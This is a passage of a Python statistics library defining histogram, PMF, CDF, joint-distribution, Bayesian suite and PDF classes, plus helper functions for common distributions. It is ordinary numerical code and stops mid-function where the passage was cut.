class Interpolator(object):
"""Represents a mapping between sorted sequences; performs linear interp.
Attributes:
xs: sorted list
ys: sorted list
"""
def __init__(self, xs, ys):
self.xs = xs
self.ys = ys
def Lookup(self, x):
"""Looks up x and returns the corresponding value of y."""
return self._Bisect(x, self.xs, self.ys)
def Reverse(self, y):
"""Looks up y and returns the corresponding value of x."""
return self._Bisect(y, self.ys, self.xs)
def _Bisect(self, x, xs, ys):
"""Helper function."""
if x <= xs[0]:
return ys[0]
if x >= xs[-1]:
return ys[-1]
i = bisect.bisect(xs, x)
frac = 1.0 * (x - xs[i - 1]) / (xs[i] - xs[i - 1])
y = ys[i - 1] + frac * 1.0 * (ys[i] - ys[i - 1])
return y
class _DictWrapper(object):
"""An object that contains a dictionary."""
def __init__(self, obj=None, label=None):
"""Initializes the distribution.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
label: string label
"""
self.label = label if label is not None else '_nolegend_'
self.d = {}
# flag whether the distribution is under a log transform
self.log = False
if obj is None:
return
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.label = label if label is not None else obj.label
if isinstance(obj, dict):
self.d.update(obj.items())
elif isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.d.update(obj.Items())
elif isinstance(obj, pandas.Series):
self.d.update(obj.value_counts().iteritems())
else:
# finally, treat it like a list
self.d.update(Counter(obj))
if len(self) > 0 and isinstance(self, Pmf):
self.Normalize()
def __hash__(self):
return id(self)
def __str__(self):
cls = self.__class__.__name__
return '%s(%s)' % (cls, str(self.d))
__repr__ = __str__
def __eq__(self, other):
return self.d == other.d
def __len__(self):
return len(self.d)
def __iter__(self):
return iter(self.d)
def iterkeys(self):
"""Returns an iterator over keys."""
return iter(self.d)
def __contains__(self, value):
return value in self.d
def __getitem__(self, value):
return self.d.get(value, 0)
def __setitem__(self, value, prob):
self.d[value] = prob
def __delitem__(self, value):
del self.d[value]
def Copy(self, label=None):
"""Returns a copy.
Make a shallow copy of d. If you want a deep copy of d,
use copy.deepcopy on the whole object.
label: string label for the new Hist
returns: new _DictWrapper with the same type
"""
new = copy.copy(self)
new.d = copy.copy(self.d)
new.label = label if label is not None else self.label
return new
def Scale(self, factor):
"""Multiplies the values by a factor.
factor: what to multiply by
Returns: new object
"""
new = self.Copy()
new.d.clear()
for val, prob in self.Items():
new.Set(val * factor, prob)
return new
def Log(self, m=None):
"""Log transforms the probabilities.
Removes values with probability 0.
Normalizes so that the largest logprob is 0.
"""
if self.log:
raise ValueError("Pmf/Hist already under a log transform")
self.log = True
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
if p:
self.Set(x, math.log(p / m))
else:
self.Remove(x)
def Exp(self, m=None):
"""Exponentiates the probabilities.
m: how much to shift the ps before exponentiating
If m is None, normalizes so that the largest prob is 1.
"""
if not self.log:
raise ValueError("Pmf/Hist not under a log transform")
self.log = False
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
self.Set(x, math.exp(p - m))
def GetDict(self):
"""Gets the dictionary."""
return self.d
def SetDict(self, d):
"""Sets the dictionary."""
self.d = d
def Values(self):
"""Gets an unsorted sequence of values.
Note: one source of confusion is that the keys of this
dictionary are the values of the Hist/Pmf, and the
values of the dictionary are frequencies/probabilities.
"""
return self.d.keys()
def Items(self):
"""Gets an unsorted sequence of (value, freq/prob) pairs."""
return self.d.items()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
Note: options are ignored
Returns:
tuple of (sorted value sequence, freq/prob sequence)
"""
if min(self.d.keys()) is np.nan:
logging.warning('Hist: contains NaN, may not render correctly.')
return zip(*sorted(self.Items()))
def MakeCdf(self, label=None):
"""Makes a Cdf."""
label = label if label is not None else self.label
return Cdf(self, label=label)
def Print(self):
"""Prints the values and freqs/probs in ascending order."""
for val, prob in sorted(self.d.items()):
print(val, prob)
def Set(self, x, y=0):
"""Sets the freq/prob associated with the value x.
Args:
x: number value
y: number freq or prob
"""
self.d[x] = y
def Incr(self, x, term=1):
"""Increments the freq/prob associated with the value x.
Args:
x: number value
term: how much to increment by
"""
self.d[x] = self.d.get(x, 0) + term
def Mult(self, x, factor):
"""Scales the freq/prob associated with the value x.
Args:
x: number value
factor: how much to multiply by
"""
self.d[x] = self.d.get(x, 0) * factor
def Remove(self, x):
"""Removes a value.
Throws an exception if the value is not there.
Args:
x: value to remove
"""
del self.d[x]
def Total(self):
"""Returns the total of the frequencies/probabilities in the map."""
total = sum(self.d.values())
return total
def MaxLike(self):
"""Returns the largest frequency/probability in the map."""
return max(self.d.values())
def Largest(self, n=10):
"""Returns the largest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=True)[:n]
def Smallest(self, n=10):
"""Returns the smallest n values, with frequency/probability.
n: number of items to return
"""
return sorted(self.d.items(), reverse=False)[:n]
class Hist(_DictWrapper):
"""Represents a histogram, which is a map from values to frequencies.
Values can be any hashable type; frequencies are integer counters.
"""
def Freq(self, x):
"""Gets the frequency associated with the value x.
Args:
x: number value
Returns:
int frequency
"""
return self.d.get(x, 0)
def Freqs(self, xs):
"""Gets frequencies for a sequence of values."""
return [self.Freq(x) for x in xs]
def IsSubset(self, other):
"""Checks whether the values in this histogram are a subset of
the values in the given histogram."""
for val, freq in self.Items():
if freq > other.Freq(val):
return False
return True
def Subtract(self, other):
"""Subtracts the values in the given histogram from this histogram."""
for val, freq in other.Items():
self.Incr(val, -freq)
class Pmf(_DictWrapper):
"""Represents a probability mass function.
Values can be any hashable type; probabilities are floating-point.
Pmfs are not necessarily normalized.
"""
def Prob(self, x, default=0):
"""Gets the probability associated with the value x.
Args:
x: number value
default: value to return if the key is not there
Returns:
float probability
"""
return self.d.get(x, default)
def Probs(self, xs):
"""Gets probabilities for a sequence of values."""
return [self.Prob(x) for x in xs]
def Percentile(self, percentage):
"""Computes a percentile of a given Pmf.
Note: this is not super efficient. If you are planning
to compute more than a few percentiles, compute the Cdf.
percentage: float 0-100
returns: value from the Pmf
"""
p = percentage / 100.0
total = 0
for val, prob in sorted(self.Items()):
total += prob
if total >= p:
return val
def ProbGreater(self, x):
"""Probability that a sample from this Pmf exceeds x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbGreater(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val > x]
return sum(t)
def ProbLess(self, x):
"""Probability that a sample from this Pmf is less than x.
x: number
returns: float probability
"""
if isinstance(x, _DictWrapper):
return PmfProbLess(self, x)
else:
t = [prob for (val, prob) in self.d.items() if val < x]
return sum(t)
def __lt__(self, obj):
"""Less than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbLess(obj)
def __gt__(self, obj):
"""Greater than.
obj: number or _DictWrapper
returns: float probability
"""
return self.ProbGreater(obj)
def __ge__(self, obj):
"""Greater than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self < obj)
def __le__(self, obj):
"""Less than or equal.
obj: number or _DictWrapper
returns: float probability
"""
return 1 - (self > obj)
def Normalize(self, fraction=1.0):
"""Normalizes this PMF so the sum of all probs is fraction.
Args:
fraction: what the total should be after normalization
Returns: the total probability before normalizing
"""
if self.log:
raise ValueError("Normalize: Pmf is under a log transform")
total = self.Total()
if total == 0.0:
raise ValueError('Normalize: total probability is zero.')
#logging.warning('Normalize: total probability is zero.')
#return total
factor = fraction / total
for x in self.d:
self.d[x] *= factor
return total
def Random(self):
"""Chooses a random element from this PMF.
Note: this is not very efficient. If you plan to call
this more than a few times, consider converting to a CDF.
Returns:
float value from the Pmf
"""
target = random.random()
total = 0.0
for x, p in self.d.items():
total += p
if total >= target:
return x
# we shouldn't get here
raise ValueError('Random: Pmf might not be normalized.')
def Mean(self):
"""Computes the mean of a PMF.
Returns:
float mean
"""
mean = 0.0
for x, p in self.d.items():
mean += p * x
return mean
def Var(self, mu=None):
"""Computes the variance of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float variance
"""
if mu is None:
mu = self.Mean()
var = 0.0
for x, p in self.d.items():
var += p * (x - mu) ** 2
return var
def Std(self, mu=None):
"""Computes the standard deviation of a PMF.
mu: the point around which the variance is computed;
if omitted, computes the mean
returns: float standard deviation
"""
var = self.Var(mu)
return math.sqrt(var)
def MaximumLikelihood(self):
"""Returns the value with the highest probability.
Returns: float probability
"""
_, val = max((prob, val) for val, prob in self.Items())
return val
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = self.MakeCdf()
return cdf.CredibleInterval(percentage)
def __add__(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf or a scalar
returns: new Pmf
"""
try:
return self.AddPmf(other)
except AttributeError:
return self.AddConstant(other)
def AddPmf(self, other):
"""Computes the Pmf of the sum of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 + v2, p1 * p2)
return pmf
def AddConstant(self, other):
"""Computes the Pmf of the sum a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 + other, p1)
return pmf
def __sub__(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.SubPmf(other)
except AttributeError:
return self.AddConstant(-other)
def SubPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 - v2, p1 * p2)
return pmf
def __mul__(self, other):
"""Computes the Pmf of the product of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.MulPmf(other)
except AttributeError:
return self.MulConstant(other)
def MulPmf(self, other):
"""Computes the Pmf of the diff of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 * v2, p1 * p2)
return pmf
def MulConstant(self, other):
"""Computes the Pmf of the product of a constant and values from self.
other: a number
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
pmf.Set(v1 * other, p1)
return pmf
def __div__(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
try:
return self.DivPmf(other)
except AttributeError:
return self.MulConstant(1/other)
__truediv__ = __div__
def DivPmf(self, other):
"""Computes the Pmf of the ratio of values drawn from self and other.
other: another Pmf
returns: new Pmf
"""
pmf = Pmf()
for v1, p1 in self.Items():
for v2, p2 in other.Items():
pmf.Incr(v1 / v2, p1 * p2)
return pmf
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.MakeCdf()
return cdf.Max(k)
class Joint(Pmf):
"""Represents a joint distribution.
The values are sequences (usually tuples)
"""
def Marginal(self, i, label=None):
"""Gets the marginal distribution of the indicated variable.
i: index of the variable we want
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
pmf.Incr(vs[i], prob)
return pmf
def Conditional(self, i, j, val, label=None):
"""Gets the conditional distribution of the indicated variable.
Distribution of vs[i], conditioned on vs[j] = val.
i: index of the variable we want
j: which variable is conditioned on
val: the value the jth variable has to have
Returns: Pmf
"""
pmf = Pmf(label=label)
for vs, prob in self.Items():
if vs[j] != val:
continue
pmf.Incr(vs[i], prob)
pmf.Normalize()
return pmf
def MaxLikeInterval(self, percentage=90):
"""Returns the maximum-likelihood credible interval.
If percentage=90, computes a 90% CI containing the values
with the highest likelihoods.
percentage: float between 0 and 100
Returns: list of values from the suite
"""
interval = []
total = 0
t = [(prob, val) for val, prob in self.Items()]
t.sort(reverse=True)
for prob, val in t:
interval.append(val)
total += prob
if total >= percentage / 100.0:
break
return interval
def MakeJoint(pmf1, pmf2):
"""Joint distribution of values from pmf1 and pmf2.
Assumes that the PMFs represent independent random variables.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
Joint pmf of value pairs
"""
joint = Joint()
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
joint.Set((v1, v2), p1 * p2)
return joint
def MakeHistFromList(t, label=None):
"""Makes a histogram from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this histogram
Returns:
Hist object
"""
return Hist(t, label=label)
def MakeHistFromDict(d, label=None):
"""Makes a histogram from a map from values to frequencies.
Args:
d: dictionary that maps values to frequencies
label: string label for this histogram
Returns:
Hist object
"""
return Hist(d, label)
def MakePmfFromList(t, label=None):
"""Makes a PMF from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(t, label=label)
def MakePmfFromDict(d, label=None):
"""Makes a PMF from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(d, label=label)
def MakePmfFromItems(t, label=None):
"""Makes a PMF from a sequence of value-probability pairs
Args:
t: sequence of value-probability pairs
label: string label for this PMF
Returns:
Pmf object
"""
return Pmf(dict(t), label=label)
def MakePmfFromHist(hist, label=None):
"""Makes a normalized PMF from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Pmf object
"""
if label is None:
label = hist.label
return Pmf(hist, label=label)
def MakeMixture(metapmf, label='mix'):
"""Make a mixture distribution.
Args:
metapmf: Pmf that maps from Pmfs to probs.
label: string label for the new Pmf.
Returns: Pmf object.
"""
mix = Pmf(label=label)
for pmf, p1 in metapmf.Items():
for x, p2 in pmf.Items():
mix.Incr(x, p1 * p2)
return mix
def MakeUniformPmf(low, high, n):
"""Make a uniform Pmf.
low: lowest value (inclusive)
high: highest value (inclusize)
n: number of values
"""
pmf = Pmf()
for x in np.linspace(low, high, n):
pmf.Set(x, 1)
pmf.Normalize()
return pmf
class Cdf(object):
"""Represents a cumulative distribution function.
Attributes:
xs: sequence of values
ps: sequence of probabilities
label: string used as a graph label.
"""
def __init__(self, obj=None, ps=None, label=None):
"""Initializes.
If ps is provided, obj must be the corresponding list of values.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
ps: list of cumulative probabilities
label: string label
"""
self.label = label if label is not None else '_nolegend_'
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
if not label:
self.label = label if label is not None else obj.label
if obj is None:
# caller does not provide obj, make an empty Cdf
self.xs = np.asarray([])
self.ps = np.asarray([])
if ps is not None:
logging.warning("Cdf: can't pass ps without also passing xs.")
return
else:
# if the caller provides xs and ps, just store them
if ps is not None:
if isinstance(ps, str):
logging.warning("Cdf: ps can't be a string")
self.xs = np.asarray(obj)
self.ps = np.asarray(ps)
return
# caller has provided just obj, not ps
if isinstance(obj, Cdf):
self.xs = copy.copy(obj.xs)
self.ps = copy.copy(obj.ps)
return
if isinstance(obj, _DictWrapper):
dw = obj
else:
dw = Hist(obj)
if len(dw) == 0:
self.xs = np.asarray([])
self.ps = np.asarray([])
return
xs, freqs = zip(*sorted(dw.Items()))
self.xs = np.asarray(xs)
self.ps = np.cumsum(freqs, dtype=np.float)
self.ps /= self.ps[-1]
def __str__(self):
return 'Cdf(%s, %s)' % (str(self.xs), str(self.ps))
__repr__ = __str__
def __len__(self):
return len(self.xs)
def __getitem__(self, x):
return self.Prob(x)
def __setitem__(self):
raise UnimplementedMethodException()
def __delitem__(self):
raise UnimplementedMethodException()
def __eq__(self, other):
return np.all(self.xs == other.xs) and np.all(self.ps == other.ps)
def Copy(self, label=None):
"""Returns a copy of this Cdf.
label: string label for the new Cdf
"""
if label is None:
label = self.label
return Cdf(list(self.xs), list(self.ps), label=label)
def MakePmf(self, label=None):
"""Makes a Pmf."""
if label is None:
label = self.label
return Pmf(self, label=label)
def Values(self):
"""Returns a sorted list of values.
"""
return self.xs
def Items(self):
"""Returns a sorted sequence of (value, probability) pairs.
Note: in Python3, returns an iterator.
"""
# TODO: rethink this function: should it just iterate
# over xs and ps (cumulative probabilities) and not compute
# differences?
a = self.ps
b = np.roll(a, 1)
b[0] = 0
return zip(self.xs, a-b)
def Shift(self, term):
"""Adds a term to the xs.
term: how much to add
"""
new = self.Copy()
# don't use +=, or else an int array + float yields int array
new.xs = new.xs + term
return new
def Scale(self, factor):
"""Multiplies the xs by a factor.
factor: what to multiply by
"""
new = self.Copy()
# don't use *=, or else an int array * float yields int array
new.xs = new.xs * factor
return new
def Prob(self, x):
"""Returns CDF(x), the probability that corresponds to value x.
Args:
x: number
Returns:
float probability
"""
if x < self.xs[0]:
return 0.0
index = bisect.bisect(self.xs, x)
p = self.ps[index-1]
return p
def Probs(self, xs):
"""Gets probabilities for a sequence of values.
xs: any sequence that can be converted to NumPy array
returns: NumPy array of cumulative probabilities
"""
xs = np.asarray(xs)
index = np.searchsorted(self.xs, xs, side='right')
ps = self.ps[index-1]
ps[xs < self.xs[0]] = 0.0
return ps
ProbArray = Probs
def Value(self, p):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
p: number in the range [0, 1]
Returns:
number value
"""
if p < 0 or p > 1:
raise ValueError('Probability p must be in range [0, 1]')
index = bisect.bisect_left(self.ps, p)
return self.xs[index]
def ValueArray(self, ps):
"""Returns InverseCDF(p), the value that corresponds to probability p.
Args:
ps: NumPy array of numbers in the range [0, 1]
Returns:
NumPy array of values
"""
ps = np.asarray(ps)
if np.any(ps < 0) or np.any(ps > 1):
raise ValueError('Probability p must be in range [0, 1]')
index = np.searchsorted(self.ps, ps, side='left')
return self.xs[index]
def Percentile(self, p):
"""Returns the value that corresponds to percentile p.
Args:
p: number in the range [0, 100]
Returns:
number value
"""
return self.Value(p / 100.0)
def PercentileRank(self, x):
"""Returns the percentile rank of the value x.
x: potential value in the CDF
returns: percentile rank in the range 0 to 100
"""
return self.Prob(x) * 100.0
def Random(self):
"""Chooses a random value from this distribution."""
return self.Value(random.random())
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int length of the sample
returns: NumPy array
"""
ps = np.random.random(n)
return self.ValueArray(ps)
def Mean(self):
"""Computes the mean of a CDF.
Returns:
float mean
"""
old_p = 0
total = 0.0
for x, new_p in zip(self.xs, self.ps):
p = new_p - old_p
total += p * x
old_p = new_p
return total
def CredibleInterval(self, percentage=90):
"""Computes the central credible interval.
If percentage=90, computes the 90% CI.
Args:
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
prob = (1 - percentage / 100.0) / 2
interval = self.Value(prob), self.Value(1 - prob)
return interval
ConfidenceInterval = CredibleInterval
def _Round(self, multiplier=1000.0):
"""
An entry is added to the cdf only if the percentile differs
from the previous value in a significant digit, where the number
of significant digits is determined by multiplier. The
default is 1000, which keeps log10(1000) = 3 significant digits.
"""
# TODO(write this method)
raise UnimplementedMethodException()
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
An empirical CDF is a step function; linear interpolation
can be misleading.
Note: options are ignored
Returns:
tuple of (xs, ps)
"""
def interleave(a, b):
c = np.empty(a.shape[0] + b.shape[0])
c[::2] = a
c[1::2] = b
return c
a = np.array(self.xs)
xs = interleave(a, a)
shift_ps = np.roll(self.ps, 1)
shift_ps[0] = 0
ps = interleave(shift_ps, self.ps)
return xs, ps
def Max(self, k):
"""Computes the CDF of the maximum of k selections from this dist.
k: int
returns: new Cdf
"""
cdf = self.Copy()
cdf.ps **= k
return cdf
def MakeCdfFromItems(items, label=None):
"""Makes a cdf from an unsorted sequence of (value, frequency) pairs.
Args:
items: unsorted sequence of (value, frequency) pairs
label: string label for this CDF
Returns:
cdf: list of (value, fraction) pairs
"""
return Cdf(dict(items), label=label)
def MakeCdfFromDict(d, label=None):
"""Makes a CDF from a dictionary that maps values to frequencies.
Args:
d: dictionary that maps values to frequencies.
label: string label for the data.
Returns:
Cdf object
"""
return Cdf(d, label=label)
def MakeCdfFromList(seq, label=None):
"""Creates a CDF from an unsorted sequence.
Args:
seq: unsorted sequence of sortable values
label: string label for the cdf
Returns:
Cdf object
"""
return Cdf(seq, label=label)
def MakeCdfFromHist(hist, label=None):
"""Makes a CDF from a Hist object.
Args:
hist: Pmf.Hist object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = hist.label
return Cdf(hist, label=label)
def MakeCdfFromPmf(pmf, label=None):
"""Makes a CDF from a Pmf object.
Args:
pmf: Pmf.Pmf object
label: string label for the data.
Returns:
Cdf object
"""
if label is None:
label = pmf.label
return Cdf(pmf, label=label)
class UnimplementedMethodException(Exception):
"""Exception if someone calls a method that should be overridden."""
class Suite(Pmf):
"""Represents a suite of hypotheses and their probabilities."""
def Update(self, data):
"""Updates each hypothesis based on the data.
data: any representation of the data
returns: the normalizing constant
"""
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdate(self, data):
"""Updates a suite of hypotheses based on new data.
Modifies the suite directly; if you want to keep the original, make
a copy.
Note: unlike Update, LogUpdate does not normalize.
Args:
data: any representation of the data
"""
for hypo in self.Values():
like = self.LogLikelihood(data, hypo)
self.Incr(hypo, like)
def UpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
This is more efficient than calling Update repeatedly because
it waits until the end to Normalize.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: the normalizing constant
"""
for data in dataset:
for hypo in self.Values():
like = self.Likelihood(data, hypo)
self.Mult(hypo, like)
return self.Normalize()
def LogUpdateSet(self, dataset):
"""Updates each hypothesis based on the dataset.
Modifies the suite directly; if you want to keep the original, make
a copy.
dataset: a sequence of data
returns: None
"""
for data in dataset:
self.LogUpdate(data)
def Likelihood(self, data, hypo):
"""Computes the likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def LogLikelihood(self, data, hypo):
"""Computes the log likelihood of the data under the hypothesis.
hypo: some representation of the hypothesis
data: some representation of the data
"""
raise UnimplementedMethodException()
def Print(self):
"""Prints the hypotheses and their probabilities."""
for hypo, prob in sorted(self.Items()):
print(hypo, prob)
def MakeOdds(self):
"""Transforms from probabilities to odds.
Values with prob=0 are removed.
"""
for hypo, prob in self.Items():
if prob:
self.Set(hypo, Odds(prob))
else:
self.Remove(hypo)
def MakeProbs(self):
"""Transforms from odds to probabilities."""
for hypo, odds in self.Items():
self.Set(hypo, Probability(odds))
def MakeSuiteFromList(t, label=None):
"""Makes a suite from an unsorted sequence of values.
Args:
t: sequence of numbers
label: string label for this suite
Returns:
Suite object
"""
hist = MakeHistFromList(t, label=label)
d = hist.GetDict()
return MakeSuiteFromDict(d)
def MakeSuiteFromHist(hist, label=None):
"""Makes a normalized suite from a Hist object.
Args:
hist: Hist object
label: string label
Returns:
Suite object
"""
if label is None:
label = hist.label
# make a copy of the dictionary
d = dict(hist.GetDict())
return MakeSuiteFromDict(d, label)
def MakeSuiteFromDict(d, label=None):
"""Makes a suite from a map from values to probabilities.
Args:
d: dictionary that maps values to probabilities
label: string label for this suite
Returns:
Suite object
"""
suite = Suite(label=label)
suite.SetDict(d)
suite.Normalize()
return suite
class Pdf(object):
"""Represents a probability density function (PDF)."""
def Density(self, x):
"""Evaluates this Pdf at x.
Returns: float or NumPy array of probability density
"""
raise UnimplementedMethodException()
def GetLinspace(self):
"""Get a linspace for plotting.
Not all subclasses of Pdf implement this.
Returns: numpy array
"""
raise UnimplementedMethodException()
def MakePmf(self, **options):
"""Makes a discrete version of this Pdf.
options can include
label: string
low: low end of range
high: high end of range
n: number of places to evaluate
Returns: new Pmf
"""
label = options.pop('label', '')
xs, ds = self.Render(**options)
return Pmf(dict(zip(xs, ds)), label=label)
def Render(self, **options):
"""Generates a sequence of points suitable for plotting.
If options includes low and high, it must also include n;
in that case the density is evaluated an n locations between
low and high, including both.
If options includes xs, the density is evaluate at those location.
Otherwise, self.GetLinspace is invoked to provide the locations.
Returns:
tuple of (xs, densities)
"""
low, high = options.pop('low', None), options.pop('high', None)
if low is not None and high is not None:
n = options.pop('n', 101)
xs = np.linspace(low, high, n)
else:
xs = options.pop('xs', None)
if xs is None:
xs = self.GetLinspace()
ds = self.Density(xs)
return xs, ds
def Items(self):
"""Generates a sequence of (value, probability) pairs.
"""
return zip(*self.Render())
class NormalPdf(Pdf):
"""Represents the PDF of a Normal distribution."""
def __init__(self, mu=0, sigma=1, label=None):
"""Constructs a Normal Pdf with given mu and sigma.
mu: mean
sigma: standard deviation
label: string
"""
self.mu = mu
self.sigma = sigma
self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'NormalPdf(%f, %f)' % (self.mu, self.sigma)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = self.mu-3*self.sigma, self.mu+3*self.sigma
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.norm.pdf(xs, self.mu, self.sigma)
class ExponentialPdf(Pdf):
"""Represents the PDF of an exponential distribution."""
def __init__(self, lam=1, label=None):
"""Constructs an exponential Pdf with given parameter.
lam: rate parameter
label: string
"""
self.lam = lam
self.label = label if label is not None else '_nolegend_'
def __str__(self):
return 'ExponentialPdf(%f)' % (self.lam)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
low, high = 0, 5.0/self.lam
return np.linspace(low, high, 101)
def Density(self, xs):
"""Evaluates this Pdf at xs.
xs: scalar or sequence of floats
returns: float or NumPy array of probability density
"""
return stats.expon.pdf(xs, scale=1.0/self.lam)
class EstimatedPdf(Pdf):
"""Represents a PDF estimated by KDE."""
def __init__(self, sample, label=None):
"""Estimates the density function based on a sample.
sample: sequence of data
label: string
"""
self.label = label if label is not None else '_nolegend_'
self.kde = stats.gaussian_kde(sample)
low = min(sample)
high = max(sample)
self.linspace = np.linspace(low, high, 101)
def __str__(self):
return 'EstimatedPdf(label=%s)' % str(self.label)
def GetLinspace(self):
"""Get a linspace for plotting.
Returns: numpy array
"""
return self.linspace
def Density(self, xs):
"""Evaluates this Pdf at xs.
returns: float or NumPy array of probability density
"""
return self.kde.evaluate(xs)
def Sample(self, n):
"""Generates a random sample from the estimated Pdf.
n: size of sample
"""
# NOTE: we have to flatten because resample returns a 2-D
# array for some reason.
return self.kde.resample(n).flatten()
def CredibleInterval(pmf, percentage=90):
"""Computes a credible interval for a given distribution.
If percentage=90, computes the 90% CI.
Args:
pmf: Pmf object representing a posterior distribution
percentage: float between 0 and 100
Returns:
sequence of two floats, low and high
"""
cdf = pmf.MakeCdf()
prob = (1 - percentage / 100.0) / 2
interval = cdf.Value(prob), cdf.Value(1 - prob)
return interval
def PmfProbLess(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 < v2:
total += p1 * p2
return total
def PmfProbGreater(pmf1, pmf2):
"""Probability that a value from pmf1 is less than a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 > v2:
total += p1 * p2
return total
def PmfProbEqual(pmf1, pmf2):
"""Probability that a value from pmf1 equals a value from pmf2.
Args:
pmf1: Pmf object
pmf2: Pmf object
Returns:
float probability
"""
total = 0.0
for v1, p1 in pmf1.Items():
for v2, p2 in pmf2.Items():
if v1 == v2:
total += p1 * p2
return total
def RandomSum(dists):
"""Chooses a random value from each dist and returns the sum.
dists: sequence of Pmf or Cdf objects
returns: numerical sum
"""
total = sum(dist.Random() for dist in dists)
return total
def SampleSum(dists, n):
"""Draws a sample of sums from a list of distributions.
dists: sequence of Pmf or Cdf objects
n: sample size
returns: new Pmf of sums
"""
pmf = Pmf(RandomSum(dists) for i in range(n))
return pmf
def EvalNormalPdf(x, mu, sigma):
"""Computes the unnormalized PDF of the normal distribution.
x: value
mu: mean
sigma: standard deviation
returns: float probability density
"""
return stats.norm.pdf(x, mu, sigma)
def MakeNormalPmf(mu, sigma, num_sigmas, n=201):
"""Makes a PMF discrete approx to a Normal distribution.
mu: float mean
sigma: float standard deviation
num_sigmas: how many sigmas to extend in each direction
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
low = mu - num_sigmas * sigma
high = mu + num_sigmas * sigma
for x in np.linspace(low, high, n):
p = EvalNormalPdf(x, mu, sigma)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def EvalBinomialPmf(k, n, p):
"""Evaluates the binomial PMF.
Returns the probabily of k successes in n trials with probability p.
"""
return stats.binom.pmf(k, n, p)
def MakeBinomialPmf(n, p):
"""Evaluates the binomial PMF.
Returns the distribution of successes in n trials with probability p.
"""
pmf = Pmf()
for k in range(n+1):
pmf[k] = stats.binom.pmf(k, n, p)
return pmf
def EvalHypergeomPmf(k, N, K, n):
"""Evaluates the hypergeometric PMF.
Returns the probabily of k successes in n trials from a population
N with K successes in it.
"""
return stats.hypergeom.pmf(k, N, K, n)
def EvalPoissonPmf(k, lam):
"""Computes the Poisson PMF.
k: number of events
lam: parameter lambda in events per unit time
returns: float probability
"""
# don't use the scipy function (yet). for lam=0 it returns NaN;
# should be 0.0
# return stats.poisson.pmf(k, lam)
return lam ** k * math.exp(-lam) / special.gamma(k+1)
def MakePoissonPmf(lam, high, step=1):
"""Makes a PMF discrete approx to a Poisson distribution.
lam: parameter lambda in events per unit time
high: upper bound of the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for k in range(0, high + 1, step):
p = EvalPoissonPmf(k, lam)
pmf.Set(k, p)
pmf.Normalize()
return pmf
def EvalExponentialPdf(x, lam):
"""Computes the exponential PDF.
x: value
lam: parameter lambda in events per unit time
